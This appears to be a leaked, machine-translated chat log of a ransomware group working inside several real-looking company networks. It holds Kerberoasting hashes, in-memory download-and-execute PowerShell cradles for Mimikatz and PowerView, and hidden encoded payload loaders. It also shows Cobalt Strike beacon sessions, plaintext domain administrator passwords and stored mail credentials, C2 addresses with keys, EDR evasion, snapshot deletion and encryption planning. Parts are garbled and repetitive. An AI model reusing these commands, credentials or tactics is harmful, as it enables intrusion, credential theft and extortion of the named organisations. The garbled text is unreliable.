                       BC255D033071CF6FF7971FFAAA716D7CFC27987C005E2FC95A139C81
                       C1B4EBBDE8E387B43D6678478EA9821DA4A3865854C73723227F4ED2
                       6C7E78B6B8D2018F7C450D3369DA404ED7DA204714B8D756C2F035FA
                       98554E28CE6E00ADEE069CC881B6EB233E1F2F4C59A369685E9FBAE2
                       B80CAAB77664628DA70C70EAA0CC91DC837B8C97B208B1141F7E2ED8
                       8602C53E8E49938CECCF88D45510906F5683DD3DF368063A30CCFA19
                       2F78D133D699B3CCDA149F2BEF8D80D6BF88DA1340D5F31546A95DA9
                       B60AAA2C2717F8DB443111651A94522D2F6DFA12D2C4DA7E990EDA84
                       EDBB8444528CF879DE065E1FA84D9BA1683E284E464197B1B227F02B
                       66E0BA9FD900A5D638F106BA8F614E277581110579EAA06AAFE60127
                       0D542CE4D35660B9EEFD4022D442C1DA40EB47ABCF1EB8B9D262161D
                       E6A1830EB3CE6ABF5C0370ACA46CAF89C4D33B0684B3E7031458CDD6
                       BEE84722E8CAF716C758EBE6268B2D2D3DD7D918A19E88DF8E6F817C
                       BE5AEBDEC12A466FF61114E10FDF24D8B00E7F8AFBB06078B1FFBAEF
                       6106D73EFC1837BC7A2ABC3F3471A9D01B519249618A7ADB9AEB9769
                       D1546EAE78A06781D5B966438851EBD25E9C2D5A4E4ED27951089B67
                       A5A993EB6C6A8F5C3F14D69A88674F2E1A8D105F8CB88A31A244216D
                       EDAA7DC6785B2AD012E34BE49EA8D6A8A272EDFDA4BFC7959E5FF88E
                       6248913FBB10C2AAAE11BE6AA549215A5DAB25E85D215DE3873BA51E
                       B0088846C4D467C514788D6D1A51A71937C04189F52978114B8B9146
                       EC0E2833E85E586181F292E0FEABDE42C9C27785800A49531E45313B
                       AC2DD1BB832C97E48663D151E0907C880BD0370E31E89C469C7C156F
                       02C764B84A5A7D2C82236426787689554602A9829D9BFF087B6E9218
                       14E1D3BBA77181A6525B2448E209777518EC5299168D6ED6A2A0E277
                       F5303F213008B834550A11188B889EED75D5C527E11764F6AFC6A80C
                       DD35D1344BAD3448689F46EB4F05DCDBCE5506C66B5A18EF28785D28
                       0BD2A2B0D4C79D6EEF3B59C759B3639BCE6AE94FE3B79BFA5F809029
                       EDC96318B6AC8AB73A950839E1447A6F5FB74F415C419B1B46DE1A37
                       769C6D1A68CF52F297906F2CCD7916BA95E0A7833534860A7A5C2177
                       22628FB126F7857C7FFCE66DC3A568EC9EDCE245D5D7C591F3867A36
                       080DB0248E6AE2FD1BDE8D4C91DFE21105C925AEFAB72128269CC10E
                       6FABD90380
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSIM1.mapciasp.com

TicketByteHexStream :
Hash : $krb5tgs$23$*sccmservice$mapciasp.com$MSSQLSvc/ASPSQL02.
                       mapciasp.com*$602430A17C9A29DAC8460019FEC6DF34$6BF0FC887
                       628A0937D628447D19956873A219C2ADBAB932D9E66C922DEC7687B8
                       4ABE8148EDFC7280F311560DAEB54432195E0F82EADC326FFDF75D99
                       B135C62EEB85BDBF97D71B2621E04E58F6725779024977914AB87B64
                       D11546BA1CBBC5B572A72549DDFBB498A16C9E12C4D5EE5080FE4073
                       AE6793FF6712FA00646B2E9C768485F3657810FA466BAED06B96CA34
                       22C1B5B3B889A286A87B4F421998424527F2EC7D47D44B7B92C30517
                       4A9EC5AC78665E8F6E00E5C662B651C7E7BCAC36800431B057E6F040
                       19D4D11F2DA190D8B3B499B9B59980B10C608142C52234C5A22F0ACC
                       99F6885E061CCB84B37FFDE988A61D3A4D57A37E453C0D0C088FB018
                       C6609E9EB56AAC276AF13E3756EE4D08459774DF8B3F5BB0B88FE7F0
                       95170DF8BB8E7BAD2FBD0BF80A9A2D955122A1347D3463173272D26D
                       9A73FA9D936B9022F21556CA3F4003444E14C6AABC2934D824308536
                       3EFD5D6747E0F35D216937761B1EAD321492D8334A36EFED08E0CC3F
                       91DAB8269EAA4B8F06E45CAD95982E247B6AA5169EA3F4EECC779C7C
                       32C347E6396C89D830A77119826C9B5B039910A6F8C07C36C477E99C
                       CB2DC1175194598FB29565654B9A3B6E455A3448950D32B0972C2BAE
                       AAABC5CB82DC4BC47BA272CD57D2C002DC6B123D24285BED35092A6E
                       14BF7CD42BA66FFEA1C0AF120C555F2101C7B962B0562BFF71FC9317
                       15B2EE403D5A36F76289D2FBC283C41BA387D13AA7535F4BD48B8F4F
                       E81FE4331F1A43DAED8DD67A8B990219C068EC9449473C36739F2773
                       41D1D118EE57AF8E1824B089CFC78F5CD22FD3E78923965AF0B21768
                       DDE4CB821E40C6AD00184710C4F0AA0807C2A703968BED888A427791
                       3395DA98F7084F53A2DBC07BD85C1863649ED5BC308B8429D1BCEFE3
                       062C5BFC5D5537192FA7D73F4ECADBF306AD55F0AE2305C3A19F4D06
                       62038B7BAA87772614817D1B271391680AF64155C952D1565B826554
                       E67C452544B3EFD95A2BBBF74F2E5BBDCD5FD8420BCB3A8E9146CD60
                       7223752AF2309C2DDDC2AEE6771C9D1CA1945E54F5747DEC939154D5
                       49A80AF35543E72BF8FED7E29E3C43B9241CC402C08C3D3AF10EA2BE
                       53DC0AD884D67B1D9201F45899A9C7AF169E99BB6038A7FE96F79CA8
                       AEC36DC2C7ED30DF500DB99E26466B2EEE540125CB9F7770439687B9
                       64020E0B0B3A865BDC7AF938AA137A88D15BFFA372318A73ACBEF568
                       9DD10A4A4AC31231C31A22AD5365FD27A9ADEA22B0982415AAE53773
                       1DCC7576EBC1564DFB45821F3A98457899BE4C3C15964C31F9B95703
                       EE81CF3186A4C815ACE960650371823A0A4F227C955F5BE0250C459E
                       7C9577F855E7CA200CCE38B2087333825635E727EFD97B915D7BBE1F
                       8E34753EA955F8C128DF362C831C115433CFD064C35F4DD35918100C
                       2D7431D040D23C4A9E4E66BC7AF58CA9AAEB658B7A7E334A30B527B8
                       D05A6812847831467111BD0D0E32BCE4F349F4D893F4001BC5CD1596
                       49E95D33396DF5AC02A9C0DFC29DFB33EAD471289EE5E59730BC1C57
                       5E0A6F3066B6E967039EA21EA545428A6566FEBE73657915EA740C02
                       91BA145DD3059FF043B1B6880F629D11C91DB0E596BD56069BA4E323
                       78905550C6A7A0507A3269634FC8D41854B02025B6A9185E922C4D83
                       A23105581
SamAccountName : sccmservice
DistinguishedName : CN=sccmservice,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL02.mapciasp.com

TicketByteHexStream :
Hash : $krb5tgs$23$*aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.ma
                       pciasp.com:1433*$7FBB03B44CB498CEA3660DC0F17F4326$CEB193
                       BE15A7B0299BEBE7BAB2A50A7A53EA924FC555D8111667F9AB4DE458
                       B220F36F08A7E3B1965BBCA55CF7F09F1EF255AD630BAC1580000E3A
                       D222A320D342DB4BC833E2E4C257E52553197BD338DEFB57B236C9E6
                       192090C832A419E665B511163E0BAFAA90690232DDE95A5650F6A6B8
                       FD5C78FD5E49EC4879816F7441971213D2861AD7E20412C549CC8517
                       677D53552B83756A2F54BAEB38497F60E8D7EB60B9D7A19BFF495016
                       06FDDE848E2DA8B8A128BAB34C77FFF5AEA18D130C6C2818877EF059
                       FB0009A8DAFE7C03028C02DDDE72672BB4E09BFBD6F6B91AFF72C0E4
                       5203A12307CE38D4CFAAF48CC5B1D000E68C11BEA41766B207657EE1
                       5BF5115CAEE8B5F42AC242857F921DC68963365579AB5245A9A261D2
                       EB551E5E8FEA013839D1AA991483C2EF6FE3117974AAD6D6E6E358D4
                       A3AF20F6760C5AA13A6BAE5CA8DFA9E2941744D664212581A6206695
                       AC7D817F4F6A0114E5FC5CDF87BB5F3887C24DC31A71EBC0BF75C668
                       E6BC1F422AC0E38D06570948272E87E7D532BB690EE6F62287866ABE
                       D4B45B094F37AD2256A971BDE09F18628D8E700FE5FA66402B0F656B
                       03FFBCE97D66E7035A7704A341E05B78F627CA42BC06C0154B403388
                       9E7475B1B10D442A54F9F95E3AE67260DE4FAB6226B210FC0CA67DA8
                       785B42B01F1D84BAC9CA7860DFBAD717E7C91B6A2FF53CA7AFCDA035
                       3EA35435695B3A98C5069BCE59BB83F2CFEEB3AB2C8A094D3DAF595B
                       DC8D4E347736B6B635B2B73EA4F10655F3FA44FEE38B78B2F42BB2FC
                       E531C0C66634D142CDC6C4C806733AF8CC250DE2234C9D7258901857
                       49502387C090BE6CB3AACE649D3D9274A7EF3838E876DDAC9563A29B
                       8E41E0EB541FE0306E999AA669293B6EDE8CC708EBD73060F093490A
                       C226A3F55C79E2376EE53B1053544A20F977EBC9A9296276B52905BE
                       0B63371C951FFDF6A65D297EBBFF81902B8F2DA42675A36C45F11C22
                       B141782F7512AD8363C23BFF25E4EF91D69386F39E1F630795B3FFA5
                       C93758C3503AC41EE6F89ACA8A60A8F3F208DE85DD24825BEEF1C13B
                       17D17C6C33B73A2787BCE9D4A79CCFF3AACD9516EA2ECF88853555D6
                       62E46125B0CE00B2EDF5E0D24C18D5DADDA81973EB4ED03FAB5BD2B6
                       C9F9D06BD5CB5B97EABF2689AC617031E51035D7FC6D33417CCA79A5
                       BF405F8063EDFD057F63554133F5E507992D982CDA68B08BD7C6B923
                       31ACCEF2AE62F47BD978E62178C95D2791D458686E171F1B3DEF886A
                       CCC76ECE68757CFED83296882DE9819A7D0DC6460E6E797DEF03CCD8
                       137E0B7DAF02F42FE1C14B0C60E86048961D658AEAF2E6740887981C
                       193082C4457CEAB32102095245195C2F9848883CDE9AF1BEAC622FDC
                       7590C0E255935455514560BE4ABB64F073754891F3F6D646B3CC1FB7
                       F6307A48BA84B7B91944190C0D8BA963AB91ABF9F52EB5ECE6101FF7
                       9934DC488320CE690433C4661431B0134C0B05511D7BF19EBFA4AD92
                       BA15E3871E7F32D8177612D05A1FB6F9917629B21B13CC009A073259
                       88E2526171CF5ECE69974CCEEE9B2D63932F9A85A1974A90A840C91F
                       14AEFF37F45A82E5F1A66276B0220977F73B445DEB06F63F458A80BC
                       4CF09C2E372D15E0141AD31F0910FCE19C7DD5003EE475ACD92A6DCB
                       0383DE61A278
SamAccountName : aspsql2svc
DistinguishedName : CN=aspsql2svc,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL2.mapciasp.com:1433




``)))pay attention yes yes without comparisons you can see and compare the payoffsvote both linksix ((New-Object System.Net.WebClient).DownloadString('https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'));``
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-ShareFinder.ps1'));
``This is the script from the git
https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1
As a consequence in the current session you write Invoke - something you've downloaded and bang it works[ ](https://mediaeveryone.com/group/mapciasp-com?msg=NvfCtE6foxs9WBEAY) here's the url of the script command above - just load it into memory without physic drop `` ``.
C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
 EULA.ps1
The term 'EULA.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0058


``Running scripts by filename? ExactlyNo one)``And who says it's issued once an hour?
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AawBKAGYAWAB0AHYATwBsAGIAdAA5AHIAVAAzAFYAWQBqAGUANwBBADQATQBxAHUAaABiAEcAOQByAGIAbgBjAHIAQQB4AHoARQAzAGMAdQAnACkAKQA7AA==
``You said you couldn't load the same load twice so restart the script in the current session for 40 minutes``.
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/'));
``Workingwithoutit``.
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AMwBrAGUANQBhAHgAWABFAGUAdQBLADkASQBtAFYAMQBCADMAYgBwAHcAQwBRAGoAYQBCAEMAYwBoAG8ARQBPAG8AdwBUAGEAWABHAGQAbwAnACkAKQA7AA==
``1 load 2 times you can't throw the load unique? check the session in tpshAnd you can't import it as a module eitherGood question, I don't know. But you can't use Invoke-Kerberoast.ps1 because ps1 is closed. So if there is no scripting on your machine and there are no modules in ps then how will it work if I import kerberos there?this is how tpsh takes the scripts load in itself.Did you try running the scripts close what scripts? any other ideas? there comes da@tl2 this https://wideio.com/USA/6LG8Ean3mNZcWV4Zk4E8A01XYmw2NOfxva5pgZVUWcjnAvyD60q45b991yG0/dashboard@tl1 have you tried pulling in tpsh ? i have access via ps and cmdkxxm
I can't believe avg and defender is so evil...even injecting it into a delta process won't work..Trying different loads, session will go to the armitage and then will fall off. No seftikatz, rubius or kerbiroz type stuff to load, tears it down right away. Run ps scripts locked. for me textmodify files for themselves net localgroup "Admin" ``.
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MAPCIASP\Domain Admins
The command completed successfully.

``output with /dom``.
The request will be processed at a domain controller for domain mapciasp.com.

Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
aspprinters
bbrooks
bkupagnt
Domain Admins
Enterprise Admins
ghouser
mkline
rmiller
sfoster
The command completed successfully.

``If I pull files from each conf 10-20 lines I will die in the number of files on the systemTo be able to search if necessary, and not fuck with the page loading in this chat.Why files about DA EA LA in ad_user 829 Objects go to 1000 users? in #general also wrote how to search historyThere is no, search for the drive file is not, check and if there your traces - clean up`` ``
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``Do you know that ps stores the history file on the system? On your own dedicec yes, it's connected via citrixts on the rdp?
																  Target : MS.Outlook:bwalkerjr@birniebus.com:PUT
																  Comment : USERNAME_TARGET_POINTER
																  UserName : bwalkerjr@birniebus.com
																  Password : @@CuAAAiBwdAEGAsBwaAUGAyBgaAIHAABgYAkGAyBgbAkGAlBgYAUHAzBgLAMGAvBQbAA
																  CredentialType : Generic
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
																  
																  Target : mail.krapfbus.com
																  UserName : bwalkerjr@birniebus.com
																  Password :
																  CredentialType : DomainPassword
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
																  
																  Target : bwalkerjr@birniebus.com
																  UserName : bwalkerjr@birniebus.com
																  Password :
																  CredentialType : DomainPassword
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
``Mb external domain birniebus.com where are they? Through cmd and psa how do you work there? Trying to get, seabelt and data on YES I know that @user9 has yes I asked how many with YES networks not up@user3 have you with YES network?[ ](https://mediaeveryone.com/channel/general?msg=idsBNFAZrjwCKbFNG) I said no doubt about it I can't say I have 1 YES real network 1 network.and tell me how many networks we got with YES which without a doubt are normal networksI'm working faster colleague I'm working 3 more people +++ no more new sessions so all worked out what was it?or not .... bullshit what's it going to be like labavo no login, it looks like there's no freebies there + mostly 7/hrs don't like it i don't@user9 ?no trusts you say ? do make a confrashash.com - make a confrash plzstateoilcompany.com - strange network
34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one.com I'm still the only one who works with it? ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work
there's a big case
can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) ``
>mail: tyler@gaudyme.com

``Ah ouch''.
>userPrincipalName: destineeg@DressinGaudy.local
``I do not believe it``) in adinfo suchDressinGaudy.local more +3 sessions and configs too from that domain there are 3 cars
2 has a client, but configs on them do not see and they are now dead
on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs[ ](https://mediaeveryone.com/channel/general?msg=MgtwStYbXqTWFDJkj) do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet still sessionsfrom him on the tachka look for vpnno have bluegracegroup.comadinfo no as not visible domain[ ](https://mediaeveryone.com/channel/general?msg=oQMWyvPFBzY3xipch) hurriedly))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come[ ](https://mediaeveryone.com/channel/general?msg=FfcCPvXueqb75SfzY) you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local[ ](https://mediaeveryone.com/channel/general?msg=ET5DAcd6gWFrqMsfh) take awaykobel.com take away here in the netcob and work[ ](https://mediaeveryone.com/channel/general?msg=Kw5w8z6gz9EsRLCTt) here sessionsAnd work with what? mine by the way, flew in, although before did not want to..they clean daona empty the rest in shit after closing the gridthere are only 2 no personal took away74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
pf,hfk``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
104.237.4.48
https://valcp.com
----------------------------------------------------------------------------------------
199.127.61.214:33914
WLzR0eDj5HH5PGAwCkOn9Dv2byQT64cQ3GY
``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` ``
199.127.61.123:15724
npUPwGS5AK1pPU6W6ZxmvzzkdhsqzqaRFWa
``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsets av and stuff like that why? faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoretically there is an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion`
please send me your names from here.
23.19.227.54
https://urlbig.com
----------------------------------------------------------------------------------------
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
``Well, I don't remember the hostname and I can't get into the koba yet.``
now throw the kobu in the history of bicon no unions do not see ``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Unavailable G:        \10.10.34.201\c$ Microsoft Windows Network
Unavailable H:        \10.10.34.242\c$ Microsoft Windows Network
Unavailable I:        \10.10.220.95\c$ Microsoft Windows Network
Unavailable J:        \10.10.220.67\c$ Microsoft Windows Network
Unavailable K:        \10.5.68.232\c$ Microsoft Windows Network
Unavailable L:        \10.91.18.5\c$ Microsoft Windows Network
Unavailable M:        \192.168.0.59\c$ Microsoft Windows Network
Unavailable N:        \10.91.18.21\c$ Microsoft Windows Network
Unavailable O: \10.10.30.64\c$ Microsoft Windows Network
Unavailable P:        \10.10.35.60\c$ Microsoft Windows Network
Unavailable Q:        \10.10.34.222\c$ Microsoft Windows Network
Unavailable R:        \10.10.39.180\c$ Microsoft Windows Network
Unavailable S:        \192.168.254.156\c$ Microsoft Windows Network
Unavailable T:        \10.91.18.76\c$ Microsoft Windows Network
Unavailable U:        \192.168.0.86\c$ Microsoft Windows Network
Unavailable V:        \10.10.72.247\c$ Microsoft Windows Network
Unavailable W:        \10.10.35.101\c$ Microsoft Windows Network
Unavailable X:        \10.10.35.85\c$ Microsoft Windows Network
Unavailable Y:        \10.10.73.9\c$ Microsoft Windows Network
Unavailable Z:        \10.10.72.139\c$ Microsoft Windows Network
The command completed successfully.

´you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba?
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil
TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list
```
10.91.19.195
10.10.31.42
10.10.39.148
10.10.35.118
10.10.220.202
10.10.35.19
10.10.80.102
10.10.220.88
10.10.222.38
10.91.18.34
10.10.34.187
10.10.34.183
10.10.30.154
10.5.68.126
10.10.222.61
10.91.18.94
10.5.68.241
10.10.221.21
10.10.220.59
10.5.65.51
10.10.220.41
10.10.221.17
10.10.35.137
10.10.73.6
10.5.67.49
i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it?
23.106.215.165
https://palside.com
----------------------------------------------------------------------------------------
199.127.60.23:57230
b5b9BPVoH7jnJt2OEQlUbLxxjvXOvoKa4Ue
``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~20-40 minutes to 1tbokay+ all understand?yes, understood? there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments look at his circle of users by group and see more tróós poznachennyh people in the network, also important to watch and there were interesting files on the computer and among them already found chrome
login: root
pass: -you then discounted a memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your online lifetime for an hour or more just times less you will still noise whether or not it and immediately this question if you have + + idea is understood?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you work with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N servers at intervals of 5 seconds such a remark to us still have comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list of ip, separated by comma, and it matches these ircons in a specified session this optimizes the time spent on the stage map arms result of processing you know and each server copy line by line ` `)
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this:
``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too basic things2) our process in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work the build itself you have 2 hours at most and speed up please for what) in the future I will know, thank you alwaysDOMENCHts not specified in the hostnameask a comrade easier) you have 5 people around what exactly is not configured as follows ?help him helpcolleague still does not know how to configure a sheet for coba go to the confab+@tl1 all here hello4 min max I just a little bit and all will soon be when? soon all will soon all not yet in place? good morning nets still scanmedr, backups, in centers, etc. all ready? here's more what found)`We also copy them to WORM tape daily, with indefinite retention. The tapes are kept in a fireproof safe at the NOC.What tape?only remote-exec returns nothing like remote-exec psexec ADM-NAS ping google.com -n 1 can you check if the remote computer is connected to the internet?he kind of need to order beforehand, I mean the crap that encrypts files)) assemble the dll? what is it, by the way, with the cryptor? + looks for non-domain ports subnetwork what ports and why? scan portsport servers, scan user subnetsuser7 Well, yes, get a colleague to help and 410 subnetwork where users sit :flushed:It seems that the delay - yesterday 60 something servers were pinged, and today over 200. I need to re-sort as usualDo you want to make a new raw? I haven't noticed, I'll do it now if you haven't noticed when you build a .bin file its hash is always differentDo you just give me a new raw what kind of shellcode is it? i can't pull anything from the lab yesterday because i can't pull anything from the test lab because dllvmi is off, psec works, but the session doesn't come specially i'm not pulling, i just jumped from user's car to dk and had to try and find where it'll let me go..and why do you pull? no, just not all can pull, in particular PDK can not you pull all the servers in the coba or what to do with servers that do not come with the session? add me to his computer froze, now reboot ... who in the group to give?
Domain = cn.net.ntes
In adusers mail = mesg.corp.netease.com
``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat
Authentication Id : 0 ; 63768393 (00000000:03cd0749)
Session : Interactive from 0
User Name : nddevbernst
Domain : JDOSSN
Logon Server : JDODC64
Logon Time : 10/23/2020 2:15:49 PM
SID : S-1-5-21-3450394983-289173729-1299264434-241049

``in the output mimic or in the ad info? is that where the user went? logon sever in the output mimicwill ask in an hour still in questionnew by how much to expect? old are theresessions working?good afternoonfaeray admin is likely to be the main technician(s) make sense to pull other machines? the current machine (dk) have already searched up and down for files related to FireEye and have already read all the counter .xml and .txtladno it is the practice of saving on the number of agents in general
EDR very often are not installed on workstations, but they are on the serverh Then I saw the assumption was based on the fact that I did not see the process of FireEyeexplain please I do not understand the logic of the assumption based on the check of the users machines? I assumed so, and you say there is no it and look admin on DK and the two servers I wrote above exactly and it runs in FierEye process is called
xagt.ehem
[+] Determining what EDR products are installed on USHDC1-CSPADS02...
[+] host called home, sent: 63 bytes
[+] FeKern.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] FireEye Found!

``dalf? Is that what it is
https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cnaEDR_Query shows on the firewall at that? there are 135 computers and all the servers? no firewall agent either? in the ad_users search:
tech, it, network, etc.
SharpSniper showed where two of them go, FireEye is not running thereEDR as I understand it is missing, based on:
https://www.anti-malware.ru/security/endpoint-detection-and-response

FireEye, as I understand it, either knocked out or not usedokjr only win defenders checked - not if in the process on the servers does not hang, so it is oldI guess it is either disabled now, or old and no one removes itFireEye is AV, right? a, the directory is[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vcDBBToC2L6hZJp3) but there is no process, no directory from it, AB can not identify sitbeltwas still installed FireEyesitbelt did not withdrawAB as I understand only win win defenders will be in kobezaberikorocha closed like a shop, this user changed the pass and session hung up, can not get a new raise-change these guys YES passwords?so do not unnecessarily noisydskink throwing tom domain sootv already removed a couple of critical pkv tom domain already work, as you prepare, I will give you a session from 2 domainsvot yes from that domain) ` `.
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
``To dk from the main working domaina to the domain how to pass)
CRCKer$``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127

Ping statistics for 10.69.0.35:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum = 10ms, Average = 10ms

beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete

